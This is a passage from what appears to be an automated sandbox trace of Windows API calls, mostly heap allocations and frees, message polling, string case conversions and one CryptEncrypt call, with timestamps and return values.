wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b88 [0223.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab920 [0223.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9c8 [0223.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ba8 [0223.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782a0 [0223.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ca8 [0223.913] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0223.913] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0223.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ce8 [0223.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bb8 [0223.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab830 [0223.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8a8 [0223.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c78 [0223.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab938 [0223.913] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0223.913] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0223.914] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0223.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71be8 [0223.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c28 [0223.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab830 [0223.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8a8 [0223.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bb8 [0223.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8d8 [0223.914] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0223.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabd28 [0223.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bc8 [0223.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cb8 [0223.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaba40 [0223.914] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0223.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xd) returned 0x2aabd28 [0223.914] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aabd28, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0223.914] CryptEncrypt (in: hKey=0x9e1c38, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x8) returned 1 [0223.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x3865490 [0223.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78390 [0223.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cc8 [0223.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabd28 [0223.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaba40 [0223.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaba70 [0223.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d68 [0223.914] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba70 | out: hHeap=0x2af0000) returned 1 [0223.914] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d68 | out: hHeap=0x2af0000) returned 1 [0223.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba40 | out: hHeap=0x2af0000) returned 1 [0223.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabad0 [0223.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaba40 [0223.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabae8 [0223.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c48 [0223.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabae8 | out: hHeap=0x2af0000) returned 1 [0223.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c48 | out: hHeap=0x2af0000) returned 1 [0223.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba40 | out: hHeap=0x2af0000) returned 1 [0223.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaba70 [0223.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaba40 [0223.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaba88 [0223.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bb8 [0223.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba88 | out: hHeap=0x2af0000) returned 1 [0223.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bb8 | out: hHeap=0x2af0000) returned 1 [0223.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba40 | out: hHeap=0x2af0000) returned 1 [0223.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaba40 [0223.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabae8 [0223.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaba88 [0223.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c38 [0223.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba88 | out: hHeap=0x2af0000) returned 1 [0223.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c38 | out: hHeap=0x2af0000) returned 1 [0223.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabae8 | out: hHeap=0x2af0000) returned 1 [0223.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabbc0 [0223.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaba88 [0223.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabb60 [0223.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bb8 [0223.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb60 | out: hHeap=0x2af0000) returned 1 [0223.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bb8 | out: hHeap=0x2af0000) returned 1 [0223.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba88 | out: hHeap=0x2af0000) returned 1 [0223.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabb78 [0223.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaba88 [0223.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabbd8 [0223.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d08 [0223.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabbd8 | out: hHeap=0x2af0000) returned 1 [0223.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d08 | out: hHeap=0x2af0000) returned 1 [0223.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba88 | out: hHeap=0x2af0000) returned 1 [0223.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaba88 [0223.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabc20 [0223.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabae8 [0223.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d68 [0223.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabae8 | out: hHeap=0x2af0000) returned 1 [0223.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d68 | out: hHeap=0x2af0000) returned 1 [0223.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc20 | out: hHeap=0x2af0000) returned 1 [0223.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabb48 [0223.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabb60 [0223.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabae8 [0223.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c48 [0223.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabae8 | out: hHeap=0x2af0000) returned 1 [0223.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c48 | out: hHeap=0x2af0000) returned 1 [0223.917] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb60 | out: hHeap=0x2af0000) returned 1 [0223.917] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ba8 | out: hHeap=0x2af0000) returned 1 [0223.917] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cb8 | out: hHeap=0x2af0000) returned 1 [0223.917] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c78 | out: hHeap=0x2af0000) returned 1 [0223.917] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c28 | out: hHeap=0x2af0000) returned 1 [0223.917] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c88 | out: hHeap=0x2af0000) returned 1 [0223.917] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0223.917] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d58 | out: hHeap=0x2af0000) returned 1 [0223.917] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780c0 | out: hHeap=0x2af0000) returned 1 [0223.917] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabcf8 | out: hHeap=0x2af0000) returned 1 [0223.917] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c98 | out: hHeap=0x2af0000) returned 1 [0223.917] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9c8 | out: hHeap=0x2af0000) returned 1 [0223.917] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab830 | out: hHeap=0x2af0000) returned 1 [0223.917] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab938 | out: hHeap=0x2af0000) returned 1 [0223.917] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8a8 | out: hHeap=0x2af0000) returned 1 [0223.917] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab980 | out: hHeap=0x2af0000) returned 1 [0223.917] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8c0 | out: hHeap=0x2af0000) returned 1 [0223.917] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9b0 | out: hHeap=0x2af0000) returned 1 [0223.917] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8d8 | out: hHeap=0x2af0000) returned 1 [0223.917] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb90 | out: hHeap=0x2af0000) returned 1 [0223.917] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab920 | out: hHeap=0x2af0000) returned 1 [0223.917] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc50 | out: hHeap=0x2af0000) returned 1 [0223.917] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb18 | out: hHeap=0x2af0000) returned 1 [0223.917] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabd10 | out: hHeap=0x2af0000) returned 1 [0223.917] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabbf0 | out: hHeap=0x2af0000) returned 1 [0223.917] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc98 | out: hHeap=0x2af0000) returned 1 [0223.917] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb00 | out: hHeap=0x2af0000) returned 1 [0223.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc80 | out: hHeap=0x2af0000) returned 1 [0223.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabcb0 | out: hHeap=0x2af0000) returned 1 [0223.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabaa0 | out: hHeap=0x2af0000) returned 1 [0223.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabba8 | out: hHeap=0x2af0000) returned 1 [0223.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabab8 | out: hHeap=0x2af0000) returned 1 [0223.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb30 | out: hHeap=0x2af0000) returned 1 [0223.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabcc8 | out: hHeap=0x2af0000) returned 1 [0223.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabce0 | out: hHeap=0x2af0000) returned 1 [0223.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc68 | out: hHeap=0x2af0000) returned 1 [0223.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba58 | out: hHeap=0x2af0000) returned 1 [0223.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7910 | out: hHeap=0x2af0000) returned 1 [0223.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0223.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab848 | out: hHeap=0x2af0000) returned 1 [0223.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d98 | out: hHeap=0x2af0000) returned 1 [0223.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab878 | out: hHeap=0x2af0000) returned 1 [0223.918] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x3865d30 [0223.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3865490 | out: hHeap=0x2af0000) returned 1 [0223.918] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.918] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d08 [0223.918] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bc8 [0223.918] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d78 [0223.918] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f80 [0223.918] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ce8 [0223.918] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab878 [0223.918] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab920 [0223.918] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ca8 [0223.918] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab980 [0223.919] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ca8 | out: hHeap=0x2af0000) returned 1 [0223.919] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab980 | out: hHeap=0x2af0000) returned 1 [0223.919] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab920 | out: hHeap=0x2af0000) returned 1 [0223.919] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab878 | out: hHeap=0x2af0000) returned 1 [0223.919] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ce8 | out: hHeap=0x2af0000) returned 1 [0223.919] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d78 | out: hHeap=0x2af0000) returned 1 [0223.919] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f80 | out: hHeap=0x2af0000) returned 1 [0223.919] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0223.919] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d08 | out: hHeap=0x2af0000) returned 1 [0223.919] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0223.919] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.919] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0223.919] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.919] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ca8 [0223.919] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ce8 [0223.919] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab920 [0223.919] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab830 [0223.919] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bc8 [0223.919] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab938 [0223.919] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0223.919] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab938 | out: hHeap=0x2af0000) returned 1 [0223.919] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab830 | out: hHeap=0x2af0000) returned 1 [0223.919] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab920 | out: hHeap=0x2af0000) returned 1 [0223.919] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ce8 | out: hHeap=0x2af0000) returned 1 [0223.920] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ca8 | out: hHeap=0x2af0000) returned 1 [0223.920] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab788 | out: hHeap=0x2af0000) returned 1 [0223.920] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c68 | out: hHeap=0x2af0000) returned 1 [0223.920] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7a0 | out: hHeap=0x2af0000) returned 1 [0223.920] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.920] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bb8 [0223.920] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab830 [0223.920] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab788 [0223.920] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c28 [0223.920] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7a0 [0223.920] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c08 [0223.920] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7180 [0223.920] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab848 [0223.920] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab878 [0223.920] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d28 [0223.920] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bf8 [0223.920] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8a8 [0223.920] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab878 | out: hHeap=0x2af0000) returned 1 [0223.920] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d28 | out: hHeap=0x2af0000) returned 1 [0223.920] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab848 | out: hHeap=0x2af0000) returned 1 [0223.920] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab848 [0223.920] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab848 | out: hHeap=0x2af0000) returned 1 [0223.920] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7180 | out: hHeap=0x2af0000) returned 1 [0223.920] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c08 | out: hHeap=0x2af0000) returned 1 [0223.920] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c28 | out: hHeap=0x2af0000) returned 1 [0223.921] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f7040 [0223.921] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c68 [0223.921] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8d8 [0223.921] CharLowerBuffW (in: lpsz="byte[8]", cchLength=0x7 | out: lpsz="byte[8]") returned 0x7 [0223.921] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x24) returned 0x2a69af0 [0223.921] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab848 [0223.921] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cd8 [0223.921] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab878 [0223.921] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c58 [0223.921] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8c0 [0223.921] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d98 [0223.921] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab920 [0223.921] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ba8 [0223.921] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab920 | out: hHeap=0x2af0000) returned 1 [0223.921] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ba8 | out: hHeap=0x2af0000) returned 1 [0223.921] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8c0 | out: hHeap=0x2af0000) returned 1 [0223.921] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d98 | out: hHeap=0x2af0000) returned 1 [0223.921] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab878 | out: hHeap=0x2af0000) returned 1 [0223.921] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c58 | out: hHeap=0x2af0000) returned 1 [0223.921] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ce8 [0223.921] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c58 [0223.921] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8d8 | out: hHeap=0x2af0000) returned 1 [0223.921] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c68 | out: hHeap=0x2af0000) returned 1 [0223.921] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8a8 | out: hHeap=0x2af0000) returned 1 [0223.922] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0223.922] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7a0 | out: hHeap=0x2af0000) returned 1 [0223.922] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab788 | out: hHeap=0x2af0000) returned 1 [0223.922] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab830 | out: hHeap=0x2af0000) returned 1 [0223.922] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bb8 | out: hHeap=0x2af0000) returned 1 [0223.922] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab908 | out: hHeap=0x2af0000) returned 1 [0223.922] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0223.922] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7b8 | out: hHeap=0x2af0000) returned 1 [0223.922] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6fe0 [0223.922] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x24) returned 0x2a69a00 [0223.922] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8c0 [0223.922] 